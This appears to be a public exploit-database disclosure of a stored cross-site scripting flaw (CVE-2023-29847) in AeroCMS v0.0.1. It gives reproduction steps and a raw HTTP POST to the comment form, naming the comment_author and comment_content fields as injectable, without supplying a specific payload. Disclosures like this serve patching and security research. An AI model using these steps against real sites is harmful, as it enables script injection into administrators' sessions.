# Exploit Title: AeroCMS v0.0.1 - Stored Cross-Site Scripting (XSS)
# Date: 2023-03-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS/archive/refs/tags/v0.0.1.zip
# Version: 0.0.1
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29847
Steps to Reproduce:
1. At first open any post.
2. then fill up comments section and your request data will be
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close
comment_author=test&comment_email=test@test.com&comment_content=test&create_comment=
3. "comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters.
4. Now login admin panel and go to "Comments" Menu
5. You will see XSS pop up (If admin approve comment so XSS pop up execute in post section).